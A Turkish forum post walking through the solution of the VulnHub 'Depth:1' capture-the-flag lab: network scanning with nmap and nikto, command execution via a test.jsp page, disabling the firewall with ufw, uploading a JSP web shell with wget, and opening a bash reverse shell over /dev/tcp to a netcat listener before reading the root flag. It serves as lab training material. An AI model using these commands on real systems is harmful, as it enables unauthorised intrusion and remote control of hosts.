Depth:1 Açıklı Makine Çözümü / ch_arli41

ch_arli41

Özel Üye
9 Tem 2009
1,036
18
Bu konumda sizlere Depth 1 açıklı makine’nin çözümünü anlatacam.Bu makinemizde hedefimiz root flag (bayrak) olacaktir.Sistemde birtane flag (bayrak) var onu bulmamız isteniyor.



Depth:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/depth-1,213/




7MaU5i.png



netdiscover komutu bize modeme bağlı cihazları listeliyor. Oradan ip’yi kopyalıyoruz.



xENzGH.png



Kod:
nmap ipadresi


Bu komut ile portlara bakıyoruz. 8080 portunu gösteriyor bize tarayıcımıza ipadresi ve port numarası olarak yazıyoruz.



xBxfmZ.png



Karşımıza web sayfası çıktı. Web sayfasında lokal dosya yolunu vermektedir orayı not alıyoruz.



s2uGHX.png


PxNsdu.png



Kod:
nikto -h http: ipadresi: port


Nikto ile hedef sistemdeki açıklara bakıyoruz. Çıkan sonuçtan test.jsp uzantısını not alıyoruz.



fArR8H.png

aMG3W7.png



ipadresi:port/test.jsp olacak şekilde tarayıcımıza yazıyoruz.Açılan sayfadaki örnek komutu yazdığımda /tmp dizinindeki dosyalarını ekrana yansıttı.




VcZqTz.png

kS6vaz.png



Araştırmaya devam ettiğimde bill kullanıcısına ulaştım. Bill kullanıcısının bir ssh dizinine ve sudo_as_admin_successfull adlı bir dosyaya sahip olduğunu görüyorum, portları tararken 22 ssh portunu bulamadım.Bu demek oluyor ki güvenlik duvarı aktif durumda onu kapatmamız gerekli.




rHXIT0.png


LZk0tg.png



Kod:
sudo ssh bill@localhost ufw disable


Bu komut ile güvenlik duvarını kapatıyoruz.




QD7xxW.png



Kod:
ls -all /var/lib/tomcat8/webapps/ROOT/


Bu kısıma birazdan shelimizi yükleyeceğiz.




9dkm1G.png


MGK1JO.png




Kod:
python -m SimpleHTTPServer

Kod:
sh -c $@| sh . echo ssh bill@localhost sudo wget [url]http://localhost:8000/shell.jsp[/url] -o /var/lib/tomcat8/webapps/ROOT/shell.jsp



Yukardaki komutları yazıp jsp shell’i yüklüyoruz.




CtCMJZ.png



Kod:
nc -lvp 2222

Kod:
ssh bill@localhost sudo bash -i>& /dev/tcp/ipadresi/2222 0>&1


Yukardaki komutları yazıyoruz ve shelimize bağlanıyoruz.




c33L41.png




Kod:
cat /root/flag



Bayrağı bulduk bir konun daha sonuna geldik.Hata alan olur ise resimli olarak hatayı iletirse yardımcı olurum.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.